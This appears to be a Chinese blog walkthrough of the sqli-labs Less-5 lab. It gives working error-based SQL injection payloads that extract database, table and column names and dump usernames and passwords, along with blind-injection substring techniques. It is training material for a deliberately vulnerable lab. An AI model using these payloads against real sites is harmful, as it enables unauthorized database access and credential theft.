<!DOCTYPE html>


<html lang="en">
  

    <head>
      <meta charset="utf-8" />
        
      <meta
        name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=1"
      />
      <title>Less-5~Less-6 |  云芽的博客</title>
  <meta name="generator" content="hexo-theme-ayer">
      
      <link rel="shortcut icon" href="/favicon.ico" />
       
<link rel="stylesheet" href="/dist/main.css">

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css"
      />
      
<link rel="stylesheet" href="/css/custom.css">
 
      <script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
       
 

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/npm/@sweetalert2/theme-bulma@5.0.1/bulma.min.css"
      />
      <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.19/dist/sweetalert2.min.js"></script>

      <!-- mermaid -->
      
      <style>
        .swal2-styled.swal2-confirm {
          font-size: 1.6rem;
        }
      </style>
    <link rel="alternate" href="/atom.xml" title="云芽的博客" type="application/atom+xml">
</head>
  </html>
</html>


<body>
  <div id="app">
    
      <canvas class="fireworks"></canvas>
      <style>
        .fireworks {
          position: fixed;
          left: 0;
          top: 0;
          z-index: 99999;
          pointer-events: none;
        }
      </style>
      
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-sqli-labs通关指南/Less-5~Less-6"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  Less-5~Less-6
</h1>
 

      
    </header>
     
    <div class="article-meta">
      <a href="/2021/10/19/sqli-labs%E9%80%9A%E5%85%B3%E6%8C%87%E5%8D%97/Less-5~Less-6/" class="article-date">
  <time datetime="2021-10-18T16:59:33.000Z" itemprop="datePublished">2021-10-19</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/sqli-labs%E9%80%9A%E5%85%B3%E6%8C%87%E5%8D%97/">sqli-labs通关指南</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> Word count:</span>
            <span class="post-count">1.2k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> Reading time≈</span>
            <span class="post-count">5 min</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <h3 id="Less-5-待重写"><a href="#Less-5-待重写" class="headerlink" title="Less-5(待重写)"></a>Less-5(待重写)</h3><p>题目：</p>
<img src="/source/images/Less-5/image-20211009151746244.png" alt="image-20211009151746244" style="zoom:33%;" />

<p>解题：</p>
<p>用?id=1’测试以下闭合情况，发现已经闭合：</p>
<img src="/source/images/Less-5/image-20211013132937733.png" alt="image-20211013132937733" style="zoom:33%;" />

<p>用order by测试发现正确是回显：You are in …而不会返回数据，错误时返回报错信息，此为一道<strong>盲注题</strong>：</p>
<img src="/source/images/Less-5/image-20211013133159986.png" alt="image-20211013133159986" style="zoom:33%;" />

<img src="/source/images/Less-5/image-20211013133250117.png" alt="image-20211013133250117" style="zoom:33%;" />

<p>方法一：利用floor<strong>报错注入</strong>一次性爆破数据</p>
<p><strong>爆库</strong>：</p>
<pre><code>?id=-1&#39; union select 1,count(*),concat((database()),floor(rand()*2))x from information_schema.tables group by x--+
</code></pre>
<p>第一次点击无报错：</p>
<img src="/source/images/Less-5/image-20211019151934512.png" alt="image-20211019151934512" style="zoom:33%;" />

<p>再点击一次爆出库名：</p>
<img src="/source/images/Less-5/image-20211019144039404.png" alt="image-20211019144039404" style="zoom:33%;" />

<p>less-5的题目为Double Injection（双查询注入/二次查询注入）</p>
<p>双查询注入其实就是一个select语句中再嵌套一个select语句，嵌套的这个语句称作子查询，例如：</p>
<pre><code>select concat((select database()));
</code></pre>
<p><strong>爆表</strong>：（疑惑点：limit0，1）</p>
<pre><code>?id=-1&#39; union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=&#39;security&#39;),floor(rand()*2))x from information_schema.tables group by x --+
</code></pre>
<p>该语句将输出字符长度限制为64个字符</p>
<img src="/source/images/Less-5/image-20211019152722321.png" alt="image-20211019152722321" style="zoom:33%;" />

<pre><code>?id=-1&#39; union select 1,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=&#39;security&#39; limit 0,1),floor(rand()*2))x from information_schema.tables group by x --+
</code></pre>
<img src="/source/images/Less-5/image-20211019153335333.png" alt="image-20211019153335333" style="zoom:33%;" />

<p><strong>爆字段</strong>：</p>
<pre><code class="group">?id=-1&#39; union select 1,count(*),concat((select group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39; limit 0,1),floor(rand()*2))x from information_schema.columns group by x --+
</code></pre>
<img src="/source/images/Less-5/image-20211019215726664.png" alt="image-20211019215726664" style="zoom:33%;" />

<p><strong>爆字段数据</strong>：</p>
<pre><code>?id=-1&#39; union select 1,count(*),concat((select group_concat(username) from security.users limit 0,1),floor(rand()*2))x from security.users group by x --+
</code></pre>
<img src="/source/images/Less-5/image-20211021002223589.png" alt="image-20211021002223589" style="zoom:33%;" />



<p>问题：正常回显而无报错。删除group_concat后可以随机逐个回显。</p>
<img src="/source/images/Less-5/image-20211021002629311.png" alt="image-20211021002629311" style="zoom:33%;" />

<p>原因：在使用floor()、rand(0)、count()、group by时，数据表中至少要有3条记录才会报错</p>
<h3 id="补充（报错注入）"><a href="#补充（报错注入）" class="headerlink" title="补充（报错注入）"></a>补充（报错注入）</h3><p>三种报错注入函数：</p>
<p>报错注入的概念：</p>
<p>(1). 通过floor报错 and (select 1 from (select count(*),concat((<br>payload),floor (rand(0)*2))x from information_schema.tables group by</p>
<p>x)a) 其中payload为你要插入的SQL语句 需要注意的是该语句将输出字符长度限制为64个字符</p>
<p>(2). 通过updatexml报错 and updatexml(1, payload,1)</p>
<p>同样该语句对输出的字符长度也做了限制，其最长输出32位,并且该语句对payload的反悔类型也做了限制，只有</p>
<p>在payload返回的不是xml格式才会生效.</p>
<p>(3). 通过extractValue报错 and extractvalue(1, payload) 输出字符有长度限制，最长32位。</p>
<ol>
<li>floor()是取整函数。</li>
</ol>
<p>注入公式（Payload为自己想获取内容的脚本）：<br>and(select 1 from (select count(*),concat(concat(payload),floor(rand(0)<em>2))x from information_schema.tables group by x)y)<br>and(select 1 from (select count(</em>),concat(concat(database(),0x7e),floor(rand(0)<em>2))x from information_schema.tables group by x)y)<br>//暴库<br>and(select 1 from (select count(</em>),concat(concat((select concat(table_name) from information_schema.tables where table_schema=”security” limit 3,1),0x7e),floor(rand(0)<em>2))x from information_schema.tables group by x)y)<br>//查询表<br>and(select 1 from (select count(</em>),concat(concat((select concat(column_name) from information_schema.columns where table_schema=”security” and table_name=”users” limit 1,1),0x7e),floor(rand(0)<em>2))x from information_schema.tables group by x)y)<br>//查询字段<br>and(select 1 from (select count(</em>),concat(concat((select concat(username,0x7e,password,0x7e) from security.users limit 1,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)y)<br>//查询字段内容</p>
<p>方法二：利用<strong>盲注</strong>一个个字符确定</p>
<p>使用left()爆基本信息：</p>
<p>根据前几道题，我们猜测数据库为security：（也可以利用bp爆破）</p>
<img src="/source/images/Less-5/image-20211013133823635.png" alt="image-20211013133823635" style="zoom:33%;" />

<img src="/source/images/Less-5/image-20211013133738477.png" alt="image-20211013133738477" style="zoom:33%;" />

<h3 id="补充（盲注）"><a href="#补充（盲注）" class="headerlink" title="补充（盲注）"></a>补充（盲注）</h3><p><strong>截取字符串</strong></p>
<p>sql注入截取字符串常用函数有三大法宝：mid(),substr(),left()</p>
<ol>
<li>mid()函数：MID(column_name,start[,length])</li>
</ol>
<p>如： str=”123456″   mid(str,2,1) 结果为2——从第二位开始截取一位，即截取第二位</p>
<p>Sql用例：</p>
<blockquote>
<p>（1）MID(DATABASE(),1,1)&gt;’a’,查看数据库名第一位，MID(DATABASE(),2,1)查看数据库名第二位，依次查看各位字符。</p>
<p>（2）MID((SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE T  table_schema=0xxxxxxx LIMIT  0,1),1,1)&gt;’a’此处column_name参数可以为sql语句，可自行构造sql语句进行注入。</p>
</blockquote>
<ol start="2">
<li>substr()函数</li>
</ol>
<p>substr()和substring()函数实现的功能是一样的，均为截取字符串。</p>
<p>string substring(string, start, length)</p>
<p>string substr(string, start, length)</p>
<p>参数描述同mid()函数，第一个参数为要处理的字符串，start为开始位置，length为截取的长度。</p>
<p>Sql用例：</p>
<blockquote>
<p>(1) substr(DATABASE(),1,1)&gt;’a’,查看数据库名第一位，substr(DATABASE(),2,1)查看数据库名第二位，依次查看各位字符。</p>
<p>(2) substr((SELECT table_name FROM INFORMATION_SCHEMA.TABLES  WHERE T table_schema=0xxxxxxx LIMIT  0,1),1,1)&gt;’a’此处string参数可以为sql语句，可自行构造sql语句进行注入。</p>
</blockquote>
<ol start="3">
<li>Left()函数</li>
</ol>
<p>Left()得到字符串左边指定个数的字符</p>
<p>Left ( string, n ) string为要截取的字符串，n为长度。</p>
<p>Sql用例：</p>
<blockquote>
<p>(1) left(database(),1)&gt;’a’,查看数据库名第一位，left(database(),2)&gt;’ab’,查看数据库名前二位。</p>
<p>(2) 同样的string可以为自行构造的sql语句。</p>
</blockquote>
<p><strong>参考链接：<a target="_blank" rel="noopener" href="http://www.cnblogs.com/lcamry/p/5504374.htm">http://www.cnblogs.com/lcamry/p/5504374.htm</a></strong></p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3> 
      <!-- reward -->
      
      <div id="reword-out">
        <div id="reward-btn">
          Donate
        </div>
      </div>
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>Copyright： </strong>
          
          Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://example.com/2021/10/19/sqli-labs%E9%80%9A%E5%85%B3%E6%8C%87%E5%8D%97/Less-5~Less-6/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2021/10/21/ctf%E5%B7%A5%E5%85%B7%E5%AE%89%E8%A3%85/MySQL/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            MySQL
          
        </div>
      </a>
    
    
      <a href="/2021/10/06/sqli-labs%E9%80%9A%E5%85%B3%E6%8C%87%E5%8D%97/Less-1~Less-4/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">Less-1~Less-4</div>
      </a>
    
  </nav>

   
<!-- valine评论 -->
<div id="vcomments-box">
  <div id="vcomments"></div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js"></script>
<script>
  new Valine({
    el: "#vcomments",
    app_id: "",
    app_key: "",
    path: window.location.pathname,
    avatar: "monsterid",
    placeholder: "给我的文章加点评论吧~",
    recordIP: true,
  });
  const infoEle = document.querySelector("#vcomments .info");
  if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
    infoEle.childNodes.forEach(function (item) {
      item.parentNode.removeChild(item);
    });
  }
</script>
<style>
  #vcomments-box {
    padding: 5px 30px;
  }

  @media screen and (max-width: 800px) {
    #vcomments-box {
      padding: 5px 0px;
    }
  }

  #vcomments-box #vcomments {
    background-color: #fff;
  }

  .v .vlist .vcard .vh {
    padding-right: 20px;
  }

  .v .vlist .vcard {
    padding-left: 10px;
  }
</style>

 
   
     
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2015-2021
        <i class="ri-heart-fill heart_icon"></i> yunya
      </li>
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>Visitors:<span id="busuanzi_value_site_uv"></span></span>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>Views:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>    
    </main>
    <div class="float_btns">
      <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

    </div>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.svg" alt="云芽的博客"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/friends">友链</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-3.6.0.min.js"></script>
 
<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->
 
<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: ".tocbot",
    contentSelector: ".article-entry",
    headingSelector: "h1, h2, h3, h4, h5, h6",
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: "main",
    positionFixedSelector: ".tocbot",
    positionFixedClass: "is-position-fixed",
    fixedSidebarOffset: "auto",
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link
  rel="stylesheet"
  href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css"
/>
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->
 <!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script> 
<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->
 
<script src="/js/busuanzi-2.3.pure.min.js"></script>
 
<!-- ClickLove -->

<!-- ClickBoom1 -->

<script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script>

<script src="/js/clickBoom1.js"></script>
 
<!-- ClickBoom2 -->

<!-- CodeCopy -->
 
<link rel="stylesheet" href="/css/clipboard.css">
 <script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>
 
<!-- CanvasBackground -->

<script>
  if (window.mermaid) {
    mermaid.initialize({ theme: "forest" });
  }
</script>


    
    

  </div>
</body>

</html>